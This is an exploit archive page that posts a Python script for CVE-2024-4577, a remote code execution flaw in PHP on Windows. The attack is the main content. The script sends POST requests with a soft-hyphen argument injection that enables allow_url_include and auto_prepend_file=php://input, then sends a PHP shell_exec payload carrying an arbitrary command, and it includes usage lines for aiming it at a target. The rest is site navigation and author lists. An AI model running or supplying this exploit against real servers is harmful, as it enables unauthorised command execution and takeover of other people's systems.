PHP Remote Code Execution

PHP Remote Code Execution: Posted Jun 14, 2024; Authored by Yesith Alvarez; PHP versions prior to 8.3.8 suffer from a remote code execution vulnerability.; tags | exploit, remote, php, code execution; advisories | CVE-2024-4577; SHA-256 | 6d8851066f1e1d5a5aa1172f697d6dfd3debd910db8f3f51cfdc80ab2a6cb6ae; Download | Favorite | View

PHP Remote Code Execution

# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / / 
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /  
 | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /   
  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
    ''')   


def exploit(url, command):       
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>' 
    }    
    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    'Content-Type': 'application/x-www-form-urlencoded'}
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)       
        #print(payload)
        print(resp.status_code)
        print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 2):
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))        
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])

Top Authors In Last 30 Days

Red Hat 202 files
Ubuntu 76 files
Debian 24 files
Ahmet Umit Bayram 6 files
Gentoo 5 files
Amit Roy 4 files
ron190 4 files
Furkan Eren Tetik 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,089)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,072)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,505)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,147)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (16,149)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,606)
UNIX (9,422)
UnixWare (187)
Windows (6,665)
Other

PHP Remote Code Execution

PHP Remote Code Execution

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP Remote Code Execution

Share This

PHP Remote Code Execution

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems